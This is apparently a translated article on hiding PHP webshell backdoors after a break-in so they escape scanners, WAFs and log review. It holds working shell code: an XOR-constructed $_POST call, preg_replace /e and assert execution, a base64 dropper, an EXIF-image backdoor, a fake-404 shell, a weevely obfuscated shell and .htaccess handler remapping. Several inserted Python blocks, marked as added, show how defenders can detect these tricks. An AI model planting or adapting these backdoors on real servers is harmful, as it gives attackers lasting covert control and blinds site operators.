0x00 Preface
After a successful test, we usually want to keep the privilege longer, so the work of leaving a backdoor is crucial. Generally, backdoor placement includes, but is not limited to, database permissions, web permissions, system user permissions, and so on. This article describes some ideas for hiding a backdoor from the well-known detection methods.
Taking a PHP web backdoor as an example.
The most common backdoor may be written like this.
Or
Of course, these differ only in the function called. For functions disabled in PHP, look at disable_functions in php.ini.
However, there are also many ways for operations staff to spot our shell at a glance, such as:
◆ An anomaly found when comparing file backups by file name, modification time or size
◆ Webshell scanning scripts such as Scanbackdoor.php, Pecker, shelldetect.php and various scanners
◆ access.log being used to trace the backdoor
◆ Or a test sentence getting blocked by the WAF, with a warning log, etc.
Against these common detection methods, the following seven sections summarize common ways to hide a shell.
0x01 Avoidance
Look at the various backdoor scanning code and you will see that leaving a well-known keyword in the shell is out of the question.
Common keywords include:
◆ System command execution: system, passthru, shell_exec, exec, popen, proc_open
◆ Code execution: eval, assert, call_user_func, base64_decode, gzinflate, gzuncompress, gzdecode, str_rot13
◆ File inclusion: require, require_once, include, include_once, file_get_contents, file_put_contents, fputs, fwrite
In the past, some people cleverly used $_POST[0]($_POST[1]) to execute commands. Unfortunately, it still hardly escapes the scanner's eye, but the ways of constructing it are endless.
Tudouya provides [a construction technique](http://www.freebuf.com/articles/web/33824.html) on FreeBuf:

```php
<?php
@$_++;                    // $_ = 1
$__=("#"^"|");            // $__ = _
$__.=("."^"~");           // _P
$__.=("/"^"`");           // _PO
$__.=("|"^"/");           // _POS
$__.=("{"^"/");           // _POST
${$__}[!$_](${$__}[$_]);  // $_POST[0]($_POST[1]);
?>
```

Constructed and generated like this, it is of course still written too obviously.
Then pad it with some ordinary code as disguise, and a simple evasive ("kill-free") shell sample appears.
It runs commands correctly and bypasses common scanners; you can also use it to write a new temporary shell.
0x02 Features
Using syntax features to execute commands is also an interesting method. When PHP processes variables, it checks whether a double-quoted string contains variables and parses their values.
Eg.:
${@eval(phpinfo())}
{} lets the variable content inside double quotes be parsed; @ suppresses the error so the variable keeps running.
Then we can roll up our sleeves and start constructing a hidden backdoor. Here we want code execution caused by a function: that's right, preg_replace.
This method has long been blacklisted by scanners, so modify it slightly:
```php
<?php
function funfunc($str){}
echo preg_replace("/(.+?)<\/title>/ies", 'funfunc("\1")', $_POST["cmd"]);
?>
```

The execution method is obvious: after the regular expression matches, `{${phpinfo()}}` is passed into funfunc and code execution is triggered:

```php
funfunc("{${phpinfo()}}");
```

Another method:

```php
<?php @assert("\$arr = \"".$_GET['cmd']."\";"); ?>
```

0x03 Inclusion
File inclusion is something everyone has played with, so only include and a few tips here.
A common one may contain a single include of a txt or jpg file, or even an inclusion vulnerability, but a scanner detects that easily, and more include files are also easy to detect.
Look at this script:

```php
<?php
if (@isset($_GET['content']))
{
    $fp = fopen('readme', 'w');
    file_put_contents('readme', "<?php \r\n");
    @file_put_contents('readme', $_GET['content'], FILE_APPEND);
    fclose($fp);
    require 'readme';
}
?>
```

It solves some problems: the required shell can be generated on demand.
Unfortunately, file_put_contents and similar functions are too sensitive and are also easily found by scanners.
A code-generation approach creates the shell when the page is accessed:

```php
<?php @fputs(fopen(base64_decode('cGx1Z2luX20ucGhw'),'w'),base64_decode('PD9waHAgQGFzc2VydCgkX1BPU1RbJ2NtZCddKTs/Pg==')); ?>
```

Some scanners can be avoided, but this pattern is also quite eye-catching, and the newly generated file must itself be hidden from scanning. Of course, newer concepts such as heuristics are not considered here.
If this method cannot meet the requirements, witty attackers turn to images again:

```php
<?php
$exif = exif_read_data('./lol.jpg');
preg_replace($exif['Make'], $exif['Model'], '');
?>
```

Reference: a backdoor hidden in JPG image EXIF.
This time you do not need to simply `copy /b` to generate an image trojan; borrowing the image's own identifier fields to feed the preg_replace execution is equally feasible.
If you see `Call to undefined function exif_read_data()`, php.ini needs to be modified: enable `extension=php_exif.dll`, and change the loading order so that it comes after `extension=php_mbstring.dll`.
We can see that this image backdoor uses the preg_replace \e modifier to parse and execute PHP variables, uses base64 encoding, and finally assembles a complete shell from the file's identifier fields. A small reminder for those hiding backdoors.
Of course, as long as there is an include point, the included file can take many forms, even error_log (though whether that is closed off may be worth considering); only unexpected...
0x04 Hiding
To prevent visitors from discovering the backdoor, clever security researchers also learn to say what the server would say:

```php
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
</body></html>
<?php
@preg_replace("/[checksql]/e",$_POST['cmd'],"saft");
?>
```
With the help of the html rendering above, the page already passes as a 404 to a casual viewer.
However, log analysis cannot be fooled by the visitor's view. To hide better among a large number of log entries, construct the following script:
```php
<?php
header('HTTP/1.1 404');
ob_start();
@fputs(fopen(base64_decode('cGx1Z2luX20ucGhw'),'w'),base64_decode('PD9waHAgQGFzc2VydCgkX1BPU1RbJ2NtZCddKTs/Pg=='));
ob_end_clean();
?>
```
The access really is a 404, and the log says the same.
However, the script to connect to has already been generated in the current directory.
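The same access.log that the 404 disguise relies on also exposes it. This is an added defender-side example, not code from the original article: it parses constructed combined-format log lines (hypothetical hosts and paths) and flags 404 responses that behave unlike a real missing page, namely a POST that is answered with 404, and a 404 whose body is empty where Apache's stock 404 page would be a few hundred bytes (the size threshold is an assumption).

```python
import re

# Constructed Apache combined-log lines (hypothetical hosts and paths, not from any real server).
ACCESS_LOG = """\
10.0.0.5 - - [12/Mar/2014:10:00:01 +0800] "GET /index.php HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
10.0.0.5 - - [12/Mar/2014:10:00:02 +0800] "GET /old-page.html HTTP/1.1" 404 209 "-" "Mozilla/5.0"
10.0.0.9 - - [12/Mar/2014:10:00:03 +0800] "GET /plugins/cache.php HTTP/1.1" 404 - "-" "Mozilla/5.0"
10.0.0.9 - - [12/Mar/2014:10:00:04 +0800] "POST /plugins/cache.php HTTP/1.1" 404 0 "-" "Mozilla/5.0"
10.0.0.7 - - [12/Mar/2014:10:00:05 +0800] "POST /login.php HTTP/1.1" 200 311 "-" "Mozilla/5.0"
"""

LINE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                  r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\S+)')

# Apache's stock 404 page (the one the disguised script imitates) is a few hundred bytes;
# header('HTTP/1.1 404') followed by ob_end_clean() sends no body at all. Threshold is an assumption.
MIN_404_BODY = 150

def parse(line):
    """Split one combined-format line into fields, or return None if it does not match."""
    m = LINE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry["status"] = int(entry["status"])
    entry["size"] = 0 if entry["size"] == "-" else int(entry["size"])
    return entry

def suspicious_404s(log_text):
    """Return (path, reason) for 404 responses that do not look like real missing pages."""
    findings = []
    for line in log_text.splitlines():
        entry = parse(line)
        if entry is None or entry["status"] != 404:
            continue
        if entry["method"] == "POST":          # nobody POSTs to a page that is not there
            findings.append((entry["path"], "POST answered with 404"))
        elif entry["size"] < MIN_404_BODY:     # a 404 with no body is not Apache's 404
            findings.append((entry["path"], f"404 with {entry['size']}-byte body"))
    return findings

if __name__ == "__main__":
    for path, reason in suspicious_404s(ACCESS_LOG):
        print(f"{path}: {reason}")
```

Grouping the findings by path over a day of logs makes a repeatedly "missing" script that keeps receiving POSTs stand out quickly.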
0x05 Obfuscation
Those who have used the weevely tool know that it generates an evasive shell like this:
```php
<?php
$penh="sIGpvaW4oYXJyYgiXlfc2xpY2UoJGEsgiJGMoJGEpLTgiMpKSkpgiKTtlY2hvICc8LycgiuJgiGsugiJz4nO30=";
$kthe="JGEpPjgiMpeyRrPSgidwcyc7ZWNobyAnPCcgiugiJGsuJz4nOgi2V2YWwoYgimFzZTY0X2giRlY2gi9kgiZShwcmVn";
$ftdf = str_replace("w","","stwrw_wrwepwlwawcwe");
$wmmi="X3JlcgiGxhY2UgioYXgiJyYXkoJy9bXlx3PVgixzXS8nLCgicvXHMvJyksIGFycmF5KCcnLCcrgiJyk";
$zrmt="JGM9J2NvdWgi50JzskgiYT0gikX0NgiPT0tJRgiTtpZihyZXNldCgkYSk9PSgidvbycggiJgiiYgJGMo";
$smgv = $ftdf("f", "", "bfafsfef6f4_fdfefcodfe");
$jgfi = $ftdf("l","","lclrlelaltel_functlilon");
$rdwm = $jgfi('', $smgv($ftdf("gi", "", $zrmt.$kthe.$wmmi.$penh))); $rdwm();
?>
```
This is what the connection looks like in the terminal:
PS: I forgot to change the terminal encoding :(
The evasion method is to generate randomly named variables in a fixed area, then use str_replace to splice together base64_decode and execute the command.
Of course, this is misdirection at the code level, to escape the scanner.
More common ways to mislead the eye:
◆ File modification time
◆ Rename the file to fit the upload folder, so that it does not stand out
◆ Disguise the file size (at least make it look like a normal script)
◆ Choose the hiding path so that it is rarely accessed
◆ Malformed directory names (%20)
Directories containing a space are relatively easy to find.
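The scanner-side counterpart to sections 0x01 through 0x05: instead of the bare keyword list from 0x01, this added example (not code from the original article or from weevely) matches one regular expression per evasion trick shown above, namely XOR-built strings, a superglobal element used as a function, preg_replace with the e modifier, `${...()}` interpolation, base64-fed file writes, str_replace-spliced function names and calling a variable as a function. The samples are constructed stand-ins for the article's snippets.

```python
import re

# Constructed samples echoing the constructions from 0x01 to 0x05 above (not live shells).
SAMPLES = {
    "xor_post":  '<?php @$_++; $__=("#"^"|"); $__.=("."^"~"); ${$__}[!$_](${$__}[$_]); ?>',
    "preg_e":    '<?php echo preg_replace("/(.+?)<\\/title>/ies", \'funfunc("\\1")\', $_POST["cmd"]); ?>',
    "interp":    '<?php $s = "${@eval(phpinfo())}"; ?>',
    "b64_write": "<?php @fputs(fopen(base64_decode('cGx1Z2luX20ucGhw'),'w'),base64_decode('PD9w')); ?>",
    "spliced":   '<?php $f = str_replace("w","","stwrw_wrwepwlwawcwe"); $g = $f("f","","bfafsfef6f4_fdfefcodfe"); $r = $g($x); $r(); ?>',
    "benign":    '<?php echo htmlspecialchars($_GET["q"]); ?>',
}

# One rule per evasion trick, instead of the bare keyword list a simple scanner uses.
RULES = [
    ("xor-built-string",        r'"[^"\\]"\s*\^\s*"[^"\\]"'),                              # "#"^"|"
    ("superglobal-as-function", r'(?:\$\{\$\w+\}|\$_(?:POST|GET|REQUEST|COOKIE))\[[^\]]*\]\s*\('),
    ("preg_replace-e-modifier", r'preg_replace\s*\(\s*["\']/[^"\']*/\w*e\w*["\']'),
    ("interpolated-call",       r'\$\{\s*@?\s*\w+\s*\('),                                    # "${@eval(...)}"
    ("base64-fed-file-write",   r'(?:fputs|fwrite|file_put_contents)\s*\(.*base64_decode\s*\('),
    ("str_replace-built-name",  r'str_replace\s*\(\s*"[^"]+"\s*,\s*""\s*,'),                 # weevely splicing
    ("variable-function-call",  r'\$\w+\s*\(\s*\$?\w*\s*\)\s*;'),                            # $rdwm();
]
COMPILED = [(name, re.compile(pattern)) for name, pattern in RULES]

def scan(source):
    """Return the names of every rule that fires on one PHP source string."""
    return [name for name, rx in COMPILED if rx.search(source)]

def scan_samples():
    """Run every rule over every constructed sample; 'benign' should come back empty."""
    return {label: scan(src) for label, src in SAMPLES.items()}

if __name__ == "__main__":
    for label, hits in scan_samples().items():
        print(f"{label:10s} -> {hits or 'clean'}")
```

Each rule is a heuristic: legitimate code can use str_replace or call a variable as a function, so treat hits as a queue for manual review rather than a verdict.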
0x06 Parsing
Use .htaccess to add a parsing backdoor.
For example:
- AddType application/x-httpd-php .jpg
Take weevely as an example.
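A handler mapping like the AddType line above is easy to audit, because it has to sit in a .htaccess file the defender can read. This added example (not from the article) parses constructed .htaccess contents and reports AddType, AddHandler or SetHandler lines that hand anything other than .php to a PHP handler; the allowlist of one extension is an assumption for this host.

```python
import re

# Constructed .htaccess contents (hypothetical, not from the article or any real site).
HTACCESS = """\
# rewrite rules omitted
AddType application/x-httpd-php .php
AddType application/x-httpd-php .jpg .gif
AddHandler php5-script .txt
SetHandler application/x-httpd-php
"""

DIRECTIVE = re.compile(r'^\s*(AddType|AddHandler|SetHandler)\s+(\S+)(.*)$', re.I)
PHP_HANDLER = re.compile(r'php', re.I)
EXPECTED = {".php"}   # assumption: nothing but .php should reach the PHP handler on this host

def php_mapping_findings(text):
    """Return (line_no, directive, extensions) for lines that hand non-.php files to PHP."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        m = DIRECTIVE.match(line)
        if not m or not PHP_HANDLER.search(m.group(2)):
            continue
        directive, exts = m.group(1), m.group(3).split()
        if directive.lower() == "sethandler":
            # SetHandler carries no extension list: every file in scope becomes PHP
            # (legitimate inside a <FilesMatch "\.php$"> block, which this check does not model).
            findings.append((n, directive, ["*"]))
        else:
            odd = [e for e in exts if e.lower() not in EXPECTED]
            if odd:
                findings.append((n, directive, odd))
    return findings

if __name__ == "__main__":
    for n, directive, exts in php_mapping_findings(HTACCESS):
        print(f"line {n}: {directive} maps {' '.join(exts)} to PHP")
```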
0x07 Mixture
To sum up, most of the methods above are just a process of constructing vulnerabilities. Code built from a vulnerability can be surprising, and so can the backdoor: you can write fine and graceful statements, or simple and crude ones, and each suits a different occasion. It is not difficult to construct your own hidden shell if you can integrate these ideas well. The above is only a summary of experience; you may have interesting ideas of your own, and I hope you will share your advice.